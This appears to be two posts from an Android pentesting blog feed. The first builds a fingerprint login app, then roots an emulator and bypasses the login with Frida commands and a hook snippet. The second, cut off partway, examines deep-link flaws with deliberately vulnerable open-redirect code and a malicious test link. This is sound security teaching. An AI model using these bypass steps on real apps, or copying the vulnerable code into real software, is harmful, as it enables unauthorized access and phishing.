-   [Run Apps on the Android Emulator](https://developer.android.com/studio/run/emulator)
-   [ADB Installation Guide](https://developer.android.com/studio/command-line/adb)

With the emulator ready, it’s time to explore how Android manages local authentication. **BiometricPrompt** simplifies integrating biometric features like fingerprints and facial recognition into your app. Let’s delve into the key concepts of local authentication and how **BiometricPrompt** ensures secure user verification.

# Understanding BiometricPrompt and Local Authentication in Android

When developing secure Android applications, authentication is a critical aspect, and Android provides several methods to verify users locally—without the need for online services. One of the most important tools for local authentication today is **BiometricPrompt**, an API introduced in Android 9 (Pie) that simplifies the integration of biometric security features like fingerprints or facial recognition into your app.

## What is Local Authentication?

Local authentication is the process of verifying a user&apos;s identity directly on the device. Unlike remote authentication, which checks credentials on a server, local authentication ensures that access to certain data or features is controlled strictly within the app or the device itself.

Traditional methods of local authentication include:

-   **PINs** or **passwords**, where users manually enter a passcode.
-   **Pattern unlocks**, a method familiar to most Android users.

While these methods are still widely used, biometric authentication has become increasingly popular due to its convenience and higher level of security.

## Introduction to BiometricPrompt

**BiometricPrompt** is Android’s modern framework for managing biometric authentication. It offers a unified way to prompt users for biometric data, handle the sensitive information securely, and provide developers with a simple API to integrate this into apps.

### Why BiometricPrompt Matters

In earlier Android versions, developers used different APIs for each biometric type (e.g., FingerprintManager). This led to inconsistencies and security risks since developers had to handle more complexity themselves. **BiometricPrompt** solves this by:

-   **Standardizing biometric access**: Whether the user has a fingerprint scanner or face unlock, the same API manages it.
-   **Improving security**: Biometric data is handled inside the device’s **Trusted Execution Environment (TEE)** or **Secure Hardware**, which means neither the operating system nor any apps can directly access the biometric data.
-   **User experience**: It ensures a consistent and familiar authentication prompt across all apps, which helps users feel more secure.

### How BiometricPrompt Works

When you use BiometricPrompt in your app, here’s what happens under the hood:

1.  The system displays a secure prompt asking the user to authenticate using a registered biometric (e.g., fingerprint, face).
2.  Biometric data is captured and processed entirely in secure hardware, meaning the app never has direct access to the raw data.
3.  If authentication is successful, BiometricPrompt triggers a callback in the app, which can be used to unlock sensitive features or data.

The **BiometricPrompt API** also allows for secure cryptographic operations through its **CryptoObject** class. This feature binds a cryptographic operation (like signing or encrypting data) to successful biometric authentication, ensuring the app’s sensitive operations can only proceed when the user’s identity is confirmed. In the following chapters, we will delve deeper into how to leverage these cryptographic operations effectively, and how to secure them against potential bypass techniques.
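As a preview of that flow, the sketch below shows how a Keystore key can be gated on authentication and bound to the prompt via **CryptoObject**. Assumptions: the alias `biometric_key` is illustrative, and `biometricPrompt`/`promptInfo` refer to instances like the ones built later in this chapter.

```kotlin
import android.security.keystore.KeyGenParameterSpec
import android.security.keystore.KeyProperties
import androidx.biometric.BiometricPrompt
import javax.crypto.Cipher
import javax.crypto.KeyGenerator

// Sketch: create a Keystore AES key that is unusable until the user
// authenticates, then bind a Cipher to the prompt through CryptoObject.
val spec = KeyGenParameterSpec.Builder(
        &quot;biometric_key&quot;,  // illustrative alias
        KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT)
    .setBlockModes(KeyProperties.BLOCK_MODE_CBC)
    .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7)
    .setUserAuthenticationRequired(true)  // gate the key on biometric auth
    .build()
val keyGenerator = KeyGenerator.getInstance(
    KeyProperties.KEY_ALGORITHM_AES, &quot;AndroidKeyStore&quot;)
keyGenerator.init(spec)
val secretKey = keyGenerator.generateKey()

val cipher = Cipher.getInstance(&quot;AES/CBC/PKCS7Padding&quot;)
cipher.init(Cipher.ENCRYPT_MODE, secretKey)
// The cipher only becomes usable once the prompt succeeds:
biometricPrompt.authenticate(promptInfo, BiometricPrompt.CryptoObject(cipher))
```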

# Code Explanation: Implementing Biometric Authentication in Android

Now that we’ve covered the theory behind **BiometricPrompt**, let&apos;s see how to implement it in practice. The following code example walks through setting up biometric authentication in an Android app, from verifying if the device supports biometrics to handling successful authentication.

#### MainActivity: Setting Up the Interface

The `MainActivity` is the entry point of the app, and the user interface is set up in the `onCreate()` method. The layout of the activity is defined in `activity_main.xml`, which includes a button (`btn_authenticate`). When the button is clicked, the app triggers the method `validateBiometricSupportAndAuthenticate()` to initiate the biometric authentication flow.

```kotlin
override fun onCreate(savedInstanceState: Bundle?) {
    super.onCreate(savedInstanceState)
    setContentView(R.layout.activity_main)

    val btnAuthenticate: Button = findViewById(R.id.btn_authenticate)
    btnAuthenticate.setOnClickListener {
        validateBiometricSupportAndAuthenticate()
    }
}

```

The `setOnClickListener()` sets up a listener for the button, which calls the method to check for biometric support when pressed.

#### Checking for Biometric Support

The `validateBiometricSupportAndAuthenticate()` method uses the **BiometricManager** class to check if the device supports biometric authentication. The method evaluates several conditions, providing feedback using `Toast` messages to inform the user about the status of the biometric hardware and whether credentials are enrolled.

```kotlin
private fun validateBiometricSupportAndAuthenticate() {
    val biometricManager = BiometricManager.from(this)
    when (biometricManager.canAuthenticate(BiometricManager.Authenticators.BIOMETRIC_STRONG or BiometricManager.Authenticators.DEVICE_CREDENTIAL)) {
        BiometricManager.BIOMETRIC_SUCCESS -&gt; {
            // The device supports biometric authentication
            showBiometricPrompt()
        }
        BiometricManager.BIOMETRIC_ERROR_NO_HARDWARE -&gt; {
            // The device does not have biometric hardware
            Toast.makeText(this, &quot;No biometric hardware available&quot;, Toast.LENGTH_SHORT).show()
        }
        BiometricManager.BIOMETRIC_ERROR_HW_UNAVAILABLE -&gt; {
            // The biometric hardware is currently unavailable
            Toast.makeText(this, &quot;Biometric hardware currently unavailable&quot;, Toast.LENGTH_SHORT).show()
        }
        BiometricManager.BIOMETRIC_ERROR_NONE_ENROLLED -&gt; {
            // No biometric credentials are enrolled on the device
            Toast.makeText(this, &quot;No biometric credentials enrolled&quot;, Toast.LENGTH_SHORT).show()
        }
    }
}


```

If the device supports biometric authentication (`BIOMETRIC_SUCCESS`), the app calls `showBiometricPrompt()` to proceed with the authentication process. If the device doesn&apos;t support biometrics or lacks enrolled credentials, appropriate error messages are displayed using `Toast`.

#### Displaying the Biometric Prompt

The `showBiometricPrompt()` method configures and displays the biometric authentication dialog. It sets up an **Executor** to manage the callbacks and ensure the authentication process runs smoothly on the main UI thread. The **BiometricPrompt** instance is created with an **AuthenticationCallback** that listens for success or failure of the authentication attempt.

```kotlin
private fun showBiometricPrompt() {
    val executor = ContextCompat.getMainExecutor(this)
    val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
        override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
            super.onAuthenticationSucceeded(result)
            showSuccess()
        }

        override fun onAuthenticationFailed() {
            super.onAuthenticationFailed()
            Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
        }
    })


```

-   **onAuthenticationSucceeded()** is triggered when the user successfully authenticates, and it calls `showSuccess()`.
-   **onAuthenticationFailed()** handles authentication failures and informs the user via a `Toast`.

The biometric prompt is then configured using `BiometricPrompt.PromptInfo.Builder()`, where you define the title, subtitle, and a fallback option for users who choose not to use biometrics.

```kotlin
val promptInfo = BiometricPrompt.PromptInfo.Builder()
    .setTitle(&quot;Biometric Authentication&quot;)
    .setSubtitle(&quot;Log in using your fingerprint&quot;)
    .setNegativeButtonText(&quot;Use password&quot;)
    .build()

biometricPrompt.authenticate(promptInfo)

```

The **PromptInfo** dialog informs the user that they need to authenticate using their fingerprint. If the user prefers, they can select the &quot;Use password&quot; option to authenticate using a different method.

#### Handling Successful Authentication

When the user successfully authenticates, the `showSuccess()` method is invoked. This method displays a success message using `Toast` and navigates the user to a new activity (`SuccessActivity`) using an **Intent**. Optionally, `finish()` is called to close the `MainActivity`, preventing the user from navigating back to it without re-authenticating.

```kotlin
private fun showSuccess() {
    Toast.makeText(this, &quot;Authentication successful!&quot;, Toast.LENGTH_SHORT).show()
    // Navigate to the SuccessActivity
    val intent = Intent(this, SuccessActivity::class.java)
    startActivity(intent)
    finish() // Optionally finish MainActivity to prevent going back without re-authentication
}

```

The transition to `SuccessActivity` completes the authentication process, showing that the user has been successfully authenticated.

```kotlin
package com.example.localauth

import android.os.Bundle
import androidx.appcompat.app.AppCompatActivity

class SuccessActivity : AppCompatActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_success)
    }
}


```

&lt;details&gt;
&lt;summary&gt;All code&lt;/summary&gt;

```kt
package com.example.localauth

import android.os.Bundle
import android.widget.Button
import android.widget.Toast
import androidx.appcompat.app.AppCompatActivity
import androidx.biometric.BiometricManager
import androidx.biometric.BiometricPrompt
import androidx.core.content.ContextCompat
import android.content.Intent

class MainActivity : AppCompatActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)

        val btnAuthenticate: Button = findViewById(R.id.btn_authenticate)
        btnAuthenticate.setOnClickListener {
            validateBiometricSupportAndAuthenticate()
        }
    }

    private fun validateBiometricSupportAndAuthenticate() {
        val biometricManager = BiometricManager.from(this)
        when (biometricManager.canAuthenticate(BiometricManager.Authenticators.BIOMETRIC_STRONG or BiometricManager.Authenticators.DEVICE_CREDENTIAL)) {
            BiometricManager.BIOMETRIC_SUCCESS -&gt; {
                // The device supports biometric authentication
                showBiometricPrompt()
            }
            BiometricManager.BIOMETRIC_ERROR_NO_HARDWARE -&gt; {
                // The device does not have biometric hardware
                Toast.makeText(this, &quot;No biometric hardware available&quot;, Toast.LENGTH_SHORT).show()
            }
            BiometricManager.BIOMETRIC_ERROR_HW_UNAVAILABLE -&gt; {
                // The biometric hardware is currently unavailable
                Toast.makeText(this, &quot;Biometric hardware currently unavailable&quot;, Toast.LENGTH_SHORT).show()
            }
            BiometricManager.BIOMETRIC_ERROR_NONE_ENROLLED -&gt; {
                // No biometric credentials are enrolled on the device
                Toast.makeText(this, &quot;No biometric credentials enrolled&quot;, Toast.LENGTH_SHORT).show()
            }
        }
    }

    private fun showBiometricPrompt() {
        val executor = ContextCompat.getMainExecutor(this)
        val biometricPrompt = BiometricPrompt(this, executor, object : BiometricPrompt.AuthenticationCallback() {
            override fun onAuthenticationSucceeded(result: BiometricPrompt.AuthenticationResult) {
                super.onAuthenticationSucceeded(result)
                showSuccess()
            }

            override fun onAuthenticationFailed() {
                super.onAuthenticationFailed()
                Toast.makeText(this@MainActivity, &quot;Authentication failed&quot;, Toast.LENGTH_SHORT).show()
            }
        })

        val promptInfo = BiometricPrompt.PromptInfo.Builder()
            .setTitle(&quot;Biometric Authentication&quot;)
            .setSubtitle(&quot;Log in using your fingerprint&quot;)
            .setNegativeButtonText(&quot;Use password&quot;)
            .build()

        biometricPrompt.authenticate(promptInfo)
    }

    private fun showSuccess() {
        Toast.makeText(this, &quot;Authentication successful!&quot;, Toast.LENGTH_SHORT).show()
        // Navigate to the SuccessActivity
        val intent = Intent(this, SuccessActivity::class.java)
        startActivity(intent)
        finish() // Optionally finish MainActivity to prevent going back without re-authentication
    }
}


```
&lt;/details&gt;


## Layouts Explanation

The user interface for the app consists of two key layouts: one for the main activity where the user initiates authentication, and another for the success screen.

#### MainActivity Layout (`activity_main.xml`)

This layout defines a simple user interface using a **LinearLayout** that centers a button on the screen. The button is used to initiate biometric authentication.

```xml
&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;LinearLayout
    xmlns:android=&quot;http://schemas.android.com/apk/res/android&quot;
    android:layout_width=&quot;match_parent&quot;
    android:layout_height=&quot;match_parent&quot;
    android:orientation=&quot;vertical&quot;
    android:gravity=&quot;center&quot;&gt;

    &lt;Button
        android:id=&quot;@+id/btn_authenticate&quot;
        android:layout_width=&quot;wrap_content&quot;
        android:layout_height=&quot;wrap_content&quot;
        android:text=&quot;Biometric Authentication&quot; /&gt;
&lt;/LinearLayout&gt;

```

-   The **LinearLayout** ensures that the button is vertically centered on the screen.
-   The button, with `id=&quot;btn_authenticate&quot;`, displays the text &quot;Biometric Authentication&quot; and is linked to the `MainActivity` via the `findViewById()` method. When clicked, it initiates the authentication process.

#### SuccessActivity Layout (`activity_success.xml`)

This layout is for the success screen that the user sees after successful authentication. It contains a **TextView** displaying a success message and an **ImageView** for visual feedback.

```xml
&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;
&lt;LinearLayout xmlns:android=&quot;http://schemas.android.com/apk/res/android&quot;
    android:layout_width=&quot;match_parent&quot;
    android:layout_height=&quot;match_parent&quot;
    android:orientation=&quot;vertical&quot;
    android:gravity=&quot;center&quot;
    android:padding=&quot;16dp&quot;&gt;

    &lt;TextView
        android:id=&quot;@+id/success_message&quot;
        android:layout_width=&quot;wrap_content&quot;
        android:layout_height=&quot;wrap_content&quot;
        android:text=&quot;Access Granted!&quot;
        android:textSize=&quot;24sp&quot;
        android:textColor=&quot;@android:color/black&quot;
        android:layout_marginBottom=&quot;16dp&quot;/&gt;

    &lt;ImageView
        android:id=&quot;@+id/success_image&quot;
        android:layout_width=&quot;wrap_content&quot;
        android:layout_height=&quot;wrap_content&quot;
        android:src=&quot;@drawable/charmander_victory&quot;
        android:contentDescription=&quot;Charmander showing victory&quot; /&gt;

&lt;/LinearLayout&gt;

```

-   The **TextView** displays the message &quot;Access Granted!&quot; with a large text size (24sp) and a bottom margin of `16dp` to provide spacing between the text and the image.
-   The **ImageView** displays an image (`charmander_victory`) that visually reinforces the success message. The image is centered below the text and uses the drawable resource `@drawable/charmander_victory`.

# Testing the App in the Android Studio Emulator

To begin testing the app, we first need to set up fingerprint authentication in the emulator. Start by navigating to the **Security** settings in the emulator and look for the **Pixel Imprint** option.

![](/content/images/2024/08/image-2.png)

Security Settings

Once inside the **Pixel Imprint** section, follow the instructions to register a fingerprint. You’ll be prompted to touch the sensor multiple times until the fingerprint is fully registered, as shown in the image below:

![](/content/images/2024/08/image-3.png)

Setting up the fingerprint

After successfully registering the fingerprint, you should see it listed under **Pixel Imprint** in the security settings.

![](/content/images/2024/08/image-4.png)

Saved fingerprint

With the fingerprint configured, it’s time to run the app. In Android Studio, simply press the **Run** button to deploy the application to the emulator.

![](/content/images/2024/09/image-9.png)

Running the application

If everything is set up correctly, the app’s user interface (UI) will appear in the emulator. As previously developed, the main layout contains a single button. By pressing this button, the app will prompt you to authenticate using the fingerprint you just set up.

![](/content/images/2024/08/image-6.png)

Accessing the second screen with local authentication

If the correct fingerprint is provided, you’ll successfully authenticate and be taken to the second screen, which features a cheerful Charmander! 😆

![](/content/images/2024/08/image-7.png)

Cool Charmander

# Bypassing local authentication

Now that we have the application installed, it’s time to demonstrate how to bypass local authentication using a rooted emulator.

## Rooting the Emulator

The first step is to root the Android Studio emulator. To make this process simpler, we’ll use a script that automates everything for us. Follow these steps:

```bash
git clone https://gitlab.com/newbit/rootAVD.git
cd rootAVD
./rootAVD.sh ListAllAVDs

```

After running the script for the first time, it will provide instructions on how to root the device.

![](/content/images/2024/09/image.png)

Command to root the emulator

Simply copy and paste the command provided by the script into your terminal. The script will then handle the entire rooting process for you.

![](/content/images/2024/09/image-1.png)

Rooting the emulator

Once the emulator is rooted, you can verify root access by running the following commands:

```bash
adb shell
su 

```

At this point, a dialog will appear in the emulator asking for permission to grant root access. Press **Grant** to confirm. You should now have root access to the emulator.

![](/content/images/2024/09/image-2.png)

Accessing the rooted device

## Installing Frida Server

To install **Frida Server**, we’ll use a **Magisk** module that automates the process. You can download the module from the link below:

[GitHub - ViRb3/magisk-frida: 🔐 Run frida-server on boot with Magisk, always up-to-date](https://github.com/ViRb3/magisk-frida)

#### Installing the Module

First, transfer the `.zip` file from the module’s GitHub release page to the emulator using **ADB**:

```bash
adb push module.zip /sdcard/Download

```

Once the module is copied, open **Magisk** on the emulator and click **Install From Storage**. Then, select the `.zip` file you just transferred.

![](/content/images/2024/09/image-3.png)

Modules of Magisk

After the module is installed, enable it and restart the emulator.

![](/content/images/2024/09/image-4.png)

Installed Magisk Module

#### Verifying the Installation

If everything is set up correctly, you should see the Frida server running on port **27042**. To verify this, run the following command:

```bash
# run inside the emulator shell (adb shell)
netstat -tupln | grep &quot;27042&quot;

```

You should see the port listed as active.

![](/content/images/2024/09/image-5.png)

Frida server running

# Bypass Using Frida

Now that everything is set up, we’ll use **Frida** to bypass the local authentication in the app. This process is straightforward and allows you to test whether the application is vulnerable to this type of attack.

#### Download the Bypass Script

First, download the script from the following link:

[android-keystore-audit/frida-scripts/fingerprint-bypass.js at master · WithSecureLabs/android-keystore-audit](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js)

This script performs several checks and, depending on the defenses implemented by the application, it will attempt different methods to bypass the authentication.
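To give an idea of what such scripts do under the hood, here is a deliberately simplified, hypothetical Frida snippet that intercepts the `authenticate()` call; the real WithSecure script is considerably more thorough:

```javascript
// Simplified, illustrative Frida hook (not the full WithSecure script):
// intercept authenticate() so the bypass has access to the app&apos;s
// AuthenticationCallback at the moment authentication is requested.
Java.perform(function () {
    var BiometricPrompt = Java.use(&quot;androidx.biometric.BiometricPrompt&quot;);
    BiometricPrompt.authenticate.overload(
        &quot;androidx.biometric.BiometricPrompt$PromptInfo&quot;
    ).implementation = function (promptInfo) {
        console.log(&quot;[*] authenticate() intercepted&quot;);
        // The real script goes further: it invokes the stored callback&apos;s
        // onAuthenticationSucceeded() with a crafted result, skipping the
        // fingerprint sensor entirely.
        return this.authenticate(promptInfo);
    };
});
```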

#### Running the Bypass Script

To use the script, launch the application with Frida by running the following command in your terminal:

```bash
frida -U -f com.example.localauth -l fingerprint-bypass.js

```

![](/content/images/2024/09/image-6.png)

Running the Frida script to bypass local authentication

Once the app is running, navigate to the main screen. When you press the button to authenticate, the Frida script will automatically bypass the authentication, granting you access to the second screen of the app.

![](/content/images/2024/09/image-8.png)

Accessing the second screen

# Conclusion

In this chapter of the **Android pentesting series**, we implemented a basic **local authentication** using **BiometricPrompt** and demonstrated how it can be bypassed using **Frida** on a rooted emulator.

Key insights:

-   The **BiometricPrompt API** provides a standard way to handle biometric authentication securely.
-   Rooted devices and tools like Frida expose vulnerabilities in basic authentication setups.
-   Strengthening code is crucial to preventing bypass attacks.

In the next chapter, we’ll focus on making the authentication process more robust and resistant to these kinds of attacks.

# Resources

-   Biometric Authentication with BiometricPrompt. &quot;Android Developers.&quot; Available at: [https://developer.android.com/training/sign-in/biometric-auth](https://developer.android.com/training/sign-in/biometric-auth)
-   Frida - Dynamic Instrumentation Toolkit. &quot;Frida.&quot; Available at: [https://frida.re](https://frida.re/)
-   Android Emulator Setup for Pentesting. &quot;HackTricks.&quot; Available at: [https://book.hacktricks.xyz/mobile-apps-pentesting/android-pentesting/android-emulator](https://book.hacktricks.xyz/mobile-apps-pentesting/android-pentesting/android-emulator)
-   Rooting the Android Emulator. &quot;RootAVD GitLab.&quot; Available at: [https://gitlab.com/newbit/rootAVD](https://gitlab.com/newbit/rootAVD)
-   Bypass Biometric Authentication in Android. &quot;HackTricks.&quot; Available at: [https://book.hacktricks.xyz/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android](https://book.hacktricks.xyz/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android)
-   OWASP Mobile Application Security Testing Guide (MASTG) - Biometric Authentication Testing. &quot;OWASP.&quot; Available at: https://mas.owasp.org/MASTG/chapters/0x06b-Testing-Authentication-and-Session-Management</content:encoded><author>Ruben Santos</author></item><item><title>Linking with Confidence: Securing Deep Links in Android Applications</title><link>https://www.kayssel.com/post/android-6</link><guid isPermaLink="true">https://www.kayssel.com/post/android-6</guid><description>Explore the power and security of deep links in Android. Understand traditional and app links, identify vulnerabilities, and learn to exploit them using the &quot;InsecureShop&quot; app. Secure your deep links with URL validation, strict intent filters, and HTTPS to protect against potential threats.</description><pubDate>Sun, 04 Aug 2024 08:35:21 GMT</pubDate><content:encoded># Introduction

Welcome to an in-depth exploration of deep links in Android! Deep links are powerful tools that allow web and mobile applications to direct users to specific content within an app, bypassing the main page. Mastering the intricacies of deep links is essential not only for enhancing user experience but also for identifying and mitigating security vulnerabilities. This chapter will equip you with the knowledge to exploit and secure deep links, ensuring your applications are resilient against potential threats such as open redirects and cross-app attacks.

#### Key Takeaways:

1.  **Types of Deep Links**: Traditional Deep Links and App Links (Universal Links) direct users to specific app content.
2.  **Configuring Deep Links**: Register deep links in the `AndroidManifest.xml` file to define which activities to open.
3.  **Detecting Vulnerabilities**: Use static and dynamic analysis to identify broad configurations and improper data handling.
4.  **Exploitation Example**: Demonstrate vulnerabilities using a vulnerable app (&quot;InsecureShop&quot;) and create a malicious webpage.
5.  **Preventing Vulnerabilities**: Validate and sanitize URL parameters, restrict broad intent filters, implement user confirmation, and use secure WebView settings.

# Deep Links in Android

Deep links in Android are URLs that allow web and mobile applications to direct users to specific content within an app rather than the main page. They work similarly to web links in a browser but open a specific view or activity within a mobile app instead of a webpage.

There are two main types of deep links in Android:

1.  **Traditional Deep Links**: These links take the user directly to a specific part of the app if the app is already installed. An example of a traditional deep link is `myapp://details?id=123`, where `myapp` is the URL scheme registered by the app, and `details?id=123` is the path and parameters indicating the specific content to be displayed.
2.  **App Links (Universal Links)**: Introduced in Android 6.0 (Marshmallow), these links work for users who have the app installed as well as those who don’t. If the app is installed, the link opens the app directly to the corresponding view. If not, the user is redirected to the app store to download it. An example of an app link is `https://www.example.com/details?id=123`, where `example.com` is the domain verified by the app.

![](/content/images/2024/07/image-5.png)

Deeplink Vulnerability Example

The primary difference between App Links and traditional deep links in Android is that App Links use standard HTTP or HTTPS URLs, allowing them to function whether or not the app is installed on the user&apos;s device. If the app is installed, App Links open the app directly; if not, they open in a web browser or redirect the user to the app store. In contrast, traditional deep links use custom URL schemes and only work if the app is already installed, failing to function properly otherwise.

To use deep links in an Android application, it&apos;s necessary to register them in the `AndroidManifest.xml` file. This registration allows the Android system to know which activities to open when a specific deep link is clicked.

```xml
&lt;activity android:name=&quot;.DetailActivity&quot;&gt;
    &lt;intent-filter&gt;
        &lt;action android:name=&quot;android.intent.action.VIEW&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.DEFAULT&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.BROWSABLE&quot;/&gt;

        &lt;!-- URL scheme for traditional deep link --&gt;
        &lt;data android:scheme=&quot;myapp&quot; android:host=&quot;details&quot; /&gt;
    &lt;/intent-filter&gt;
&lt;/activity&gt;

```

&lt;details&gt;
&lt;summary&gt;For an App Link:&lt;/summary&gt;

```xml
&lt;activity android:name=&quot;.DetailActivity&quot;&gt;
    &lt;intent-filter android:autoVerify=&quot;true&quot;&gt;
        &lt;action android:name=&quot;android.intent.action.VIEW&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.DEFAULT&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.BROWSABLE&quot;/&gt;

        &lt;!-- URL pattern for app link --&gt;
        &lt;data android:scheme=&quot;https&quot; android:host=&quot;www.example.com&quot; android:pathPrefix=&quot;/details&quot; /&gt;
    &lt;/intent-filter&gt;
&lt;/activity&gt;

```
&lt;/details&gt;


A summary of what the different fields mean is as follows:

-   **Activity Declaration**: Specifies which activity handles the deep link. Example: `&lt;activity android:name=&quot;.DetailActivity&quot;&gt;`.
-   **Intent Filter**: Defines the criteria for starting the activity. Includes actions, categories, and data elements.
-   **Action**: `android.intent.action.VIEW` indicates the activity can handle view actions, suitable for deep links.
-   **Categories**:
    -   `android.intent.category.DEFAULT`: Ensures the intent can be matched by the system.
    -   `android.intent.category.BROWSABLE`: Allows the link to be opened from a web browser or other apps.
-   **Data**:
    -   **Traditional Deep Links**: `&lt;data android:scheme=&quot;myapp&quot; android:host=&quot;details&quot; /&gt;` specifies a custom URL scheme and host.
    -   **App Links**: `&lt;data android:scheme=&quot;https&quot; android:host=&quot;www.example.com&quot; android:pathPrefix=&quot;/details&quot; /&gt;` specifies a web URL pattern.
-   **Auto Verify**: `android:autoVerify=&quot;true&quot;` (for App Links) directs the system to verify the app’s association with the domain, ensuring the app handles the URL if installed.

## Example of a vulnerable Deeplink

Poorly configured deep links can introduce significant security vulnerabilities to an application. Understanding these weaknesses is crucial for identifying potential exploitation points. Let’s explore an example of such a configuration and understand why it&apos;s problematic.

Here’s an example from the `AndroidManifest.xml`:

**`AndroidManifest.xml`**:

```xml
&lt;activity android:name=&quot;.DetailActivity&quot;&gt;
    &lt;intent-filter&gt;
        &lt;action android:name=&quot;android.intent.action.VIEW&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.DEFAULT&quot;/&gt;
        &lt;category android:name=&quot;android.intent.category.BROWSABLE&quot;/&gt;
        
        &lt;!-- Overly broad URL scheme and path pattern --&gt;
        &lt;data android:scheme=&quot;myapp&quot; android:host=&quot;*&quot; android:pathPattern=&quot;.*&quot;/&gt;
    &lt;/intent-filter&gt;
&lt;/activity&gt;


```

This setup is problematic because it uses overly broad filters. Specifically, `android:host=&quot;*&quot;` and `android:pathPattern=&quot;.*&quot;` allow any host and any path to trigger the activity, which is too permissive and can inadvertently expose sensitive parts of the app.

In the corresponding activity, the handling of the deep link might look like this:

```java
@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_detail);

    // Handle the intent
    Intent intent = getIntent();
    Uri data = intent.getData();
    if (data != null) {
        String itemId = data.getQueryParameter(&quot;id&quot;);
        // Directly use itemId without validation
        // Redirect based on user input
        String redirectUrl = data.getQueryParameter(&quot;redirect&quot;);
        if (redirectUrl != null) {
            Intent browserIntent = new Intent(Intent.ACTION_VIEW, Uri.parse(redirectUrl));
            startActivity(browserIntent);
        }
    }
}

```

Here, several issues arise. First, the `itemId` parameter is used directly without any validation, opening the door to injection attacks if malicious data is provided. Second, the `redirectUrl` parameter allows for redirection based on user input without validation, creating an open redirect vulnerability which can be exploited for phishing attacks.
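
The redirect logic above can be checked off-device. The following sketch is a stricter counterpart in plain Java: it parses the `redirect` parameter and compares scheme and host against an allow-list instead of trusting the raw string. The class name, helper name, and `trusted-domain.com` allow-list entry are illustrative placeholders, not code from the app:

```java
import java.net.URI;
import java.util.Set;

public class RedirectGuard {

    // Hypothetical allow-list; replace with the hosts your app actually trusts
    private static final Set&lt;String&gt; ALLOWED_HOSTS = Set.of(&quot;trusted-domain.com&quot;);

    // Accept a redirect only when the scheme is https and the host matches exactly
    public static boolean isSafeRedirect(String url) {
        if (url == null) {
            return false;
        }
        try {
            URI u = URI.create(url);
            return &quot;https&quot;.equals(u.getScheme())
                    &amp;&amp; u.getHost() != null
                    &amp;&amp; ALLOWED_HOSTS.contains(u.getHost());
        } catch (IllegalArgumentException e) {
            return false; // malformed URL: reject
        }
    }

    public static void main(String[] args) {
        System.out.println(isSafeRedirect(&quot;https://trusted-domain.com/page&quot;));     // true
        System.out.println(isSafeRedirect(&quot;http://malicious-site.com&quot;));           // false
        System.out.println(isSafeRedirect(&quot;https://trusted-domain.com.evil.com&quot;)); // false
    }
}

```

Note the exact host comparison: a lookalike domain such as `trusted-domain.com.evil.com` is rejected because its host does not equal the allow-listed value.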

### Detecting Poorly Configured Deep Links

To identify poorly configured deep links, both static and dynamic analysis are necessary.

**Static Analysis** involves reviewing the `AndroidManifest.xml` file and the activity code. Look for intent filters with overly broad configurations, such as `android:host=&quot;*&quot;` or `android:pathPattern=&quot;.*&quot;`. These are too permissive and should be avoided. Additionally, scrutinize how data from the intent is handled within the activity.

**Dynamic Analysis** involves testing the app by crafting various deep links to observe its behavior. For example, you might use a link like `myapp://unauthorized/path` to test if the app improperly grants access to restricted areas. Another test could involve `myapp://details?id=123&amp;redirect=http://malicious-site.com` to check for open redirect vulnerabilities.

# DeepLink Exploitation

## Installing the vulnerable application

To demonstrate the attack, I will use a vulnerable application called &quot;InsecureShop.&quot; The installation process is quite straightforward using ADB:

```bash
adb connect &lt;ip&gt;
adb install &lt;apk&gt;

```

[Releases · hax0rgb/InsecureShop](https://github.com/hax0rgb/InsecureShop/releases)

## Static Analysis

Next, to determine whether the application is vulnerable through its deep links, we can start with a brief static analysis of the code. To do this, we first need to decompile the APK. As in previous chapters of this series, we can use tools like `apkx` for this purpose, which gives us access to the entire code of the APK.

```bash
apkx InsecureShop.apk

```

[GitHub - skylot/jadx: Dex to Java decompiler](https://github.com/skylot/jadx)

Alternatively, you can use `jadx`, another APK decompiler. The advantage of this tool is that it features a GUI, allowing you to interact directly with the Java code. To start the decompilation process, simply navigate to **File** -&gt; **Open File** and select the APK.

![](/content/images/2024/07/image-13.png)

Open the APK with Jadx

After this, as I mentioned earlier, we should first inspect the `AndroidManifest.xml` file to check the configuration of the DeepLinks. Upon doing this, I noticed that the `WebViewActivity` specifies the scheme and host but not the path. Because of this, if the code managing the activity doesn&apos;t implement proper controls over the link parameters, it could lead to vulnerabilities such as open redirects.

![](/content/images/2024/07/image-8.png)

Vulnerable WebViewActivity

To locate the code for the activity, we can search for &quot;WebViewActivity&quot; using the search function in jadx by navigating to **Navigation** -&gt; **Text Search**. Once the activity is found, we can examine the configuration used to invoke it.

![](/content/images/2024/07/image-9.png)

Settings that can make the Webview more vulnerable

The two most important settings are `setJavaScriptEnabled` and `setAllowUniversalAccessFromFileURLs`.

-   **setJavaScriptEnabled**: This setting determines whether JavaScript is enabled within the WebView. Enabling JavaScript (`setJavaScriptEnabled(true)`) allows for interactive features and enhanced functionality in web content. However, it also opens up the risk of Cross-Site Scripting (XSS) attacks if not properly managed.
-   **setAllowUniversalAccessFromFileURLs**: This setting controls whether JavaScript running in a file URL context can access content from any origin, including other file URLs or remote servers. While it can be useful for certain functionalities, enabling this setting (`setAllowUniversalAccessFromFileURLs(true)`) can introduce severe security risks, such as arbitrary file access and cross-context scripting.

![](/content/images/2024/07/image-10.png)

Vulnerable Code

